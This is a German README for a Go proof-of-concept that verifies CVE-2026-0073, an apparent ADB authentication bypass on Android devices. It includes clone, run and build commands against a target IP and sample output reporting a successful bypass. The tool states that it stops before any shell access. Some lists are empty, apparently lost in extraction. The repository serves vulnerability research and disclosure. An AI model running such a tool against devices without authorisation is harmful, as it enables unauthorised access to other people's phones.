
Sicherheitsforschungs-PoC für CVE-2026-0073: Verifizierung der ADB-Authentifizierungsumgehung
Security-Research-PoC von naheeju
Sicherheitshinweis: CVE-2026-0073 wurde am 01.05.2026 gepatcht. Dieses PoC dient ausschließlich der Sicherheitsforschung, Schwachstellenanalyse und autorisierten Tests betroffener Systeme.
Dieses Repository enthält einen Proof of Concept (PoC), der für Sicherheitsforschung, Schwachstellenanalyse, autorisierte Penetrationstests und Bildungszwecke erstellt wurde.
Testen Sie nur Systeme und Geräte, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zur Bewertung haben.
Dieses öffentliche PoC stoppt absichtlich nach der Reproduktion des Authentifizierungszustands. Es öffnet nicht:
Der Zweck dieses Repositorys besteht darin, den Schwachstellenzustand auf kontrollierte und nicht-destruktive Weise zu demonstrieren.
POC-CVE-2026-0073 ist ein Go-basierter Proof of Concept, der den ADB-Authentifizierungsablauf
im Zusammenhang mit der Schwachstelle testet. Das PoC kommuniziert direkt mit dem
ADB-Dienst und beobachtet die CNXN → STLS → TLS-Authentifizierungssequenz.
ADB-Ziel
│
│ TCP
▼
CNXN-Anfrage
│
▼
tls_auth erkannt
│
▼
STLS-Anfrage
│
▼
TLS-Authentifizierungstest
│
▼
Schwachstellenzustand reproduziert
│
▼
AUSNUTZUNG ERFOLGREICH
│
▼
STOPP
Das PoC endet an diesem Punkt und fährt nicht mit dem Shell-Zugriff nach der Authentifizierung fort.
CNXN-Nachricht.tls_auth bewirbt.STLS-Anfrage.Das Zertifikat wird im Speicher erzeugt und nicht absichtlich auf die Festplatte geschrieben.
Die öffentliche Implementierung stoppt absichtlich nach der erfolgreichen Authentifizierungsverifizierung. In diesem PoC wird kein Dienst nach der Authentifizierung geöffnet.
Insbesondere öffnet das PoC keine shell: und akzeptiert kein Befehlsargument.
Dadurch bleibt das öffentliche Repository auf die Schwachstellenverifizierung fokussiert,
anstatt eine allgemeine Remote-Shell-Implementierung bereitzustellen.
Stellen Sie vor der Ausführung des PoC sicher, dass das Zielgerät die folgenden Bedingungen erfüllt:
Überprüfen Sie Ihre Go-Installation:
go version
POC-CVE-2026-0073/
├── cmd/
│ └── main.go
├── go.mod
├── go.sum
└── README.md
cmd/main.go enthält das öffentliche Schwachstellenverifizierungs-PoC.
git clone https://github.com/naheeju/POC-CVE-2026-0073.git
cd POC-CVE-2026-0073
go mod download
go run ./cmd <IP> [PORT] [KEY_TYPE]
| Argument | Erforderlich | Standard | Beschreibung |
|---|---|---|---|
IP | Ja | — | IP-Adresse des autorisierten Testgeräts |
PORT | Nein | 5555 | ADB-TCP-Dienstport |
KEY_TYPE | Nein | ec | Zertifikatstyp: ec oder ed25519 |
# Standard-EC-Zertifikat
go run ./cmd 192.168.1.2 5555 ec
# Ed25519
go run ./cmd 192.168.1.2 5555 ed25519
# Benutzerdefinierter Port
go run ./cmd 192.168.1.2 35495 ec
Ersetzen Sie die IP-Adresse und den Port durch die Ihres autorisierten Laborziels.
go build -o netra ./cmd
./netra 192.168.1.2 5555 ec
Die kompilierte
netra-Binärdatei ist ein lokales Build-Artefakt und sollte nicht in das öffentliche Repository übertragen werden.
============================================================
ADB-AUTHENTIFIZIERUNGS-BYPASS - PoC
============================================================
Von: naheeju
============================================================
Nur Sicherheitsforschung / Autorisierte Tests
Dieses PoC stoppt absichtlich vor der Shell-Ausführung.
============================================================
[*] Ziel : 192.168.1.2:35495
[*] Schlüsseltyp : ec
[*] Modus : Authentifizierungsverifizierung
[*] Erzeuge ec-Testzertifikat im Speicher...
[+] Testzertifikat erzeugt.
[*] Verbinde mit ADB-Dienst...
[*] Sende CNXN...
[+] STLS angefordert (TLS-Version: 0x1000000)
[*] Bestätige TLS-Upgrade...
[*] Teste TLS-Authentifizierungsvalidierung...
[+] TLS-Handshake akzeptiert.
Protokoll : TLSv1.3
Cipher : 0x1301
============================================================
AUSNUTZUNG ERFOLGREICH
============================================================
[+] Authentifizierungszustand reproduziert.
[+] TLS-Authentifizierung akzeptiert.
[+] Schwachstellenzustand bestätigt.
[*] Sicherheitsgrenze erreicht.
[*] Keine ADB-Shell geöffnet.
[*] Kein Befehl ausgeführt.
[*] PoC sicher beendet.
============================================================
AUSNUTZUNG ERFOLGREICH?In diesem Repository bedeutet die Meldung, dass das PoC den getesteten Authentifizierungszustand erfolgreich reproduziert hat. Es bedeutet nicht, dass:
Das PoC endet absichtlich unmittelbar nach der Verifizierungsphase.
Wenn das Ziel den Authentifizierungstest ablehnt, meldet das PoC einen Authentifizierungsfehler und beendet sich:
[-] Authentifizierung abgelehnt.
Mögliche Ursachen sind: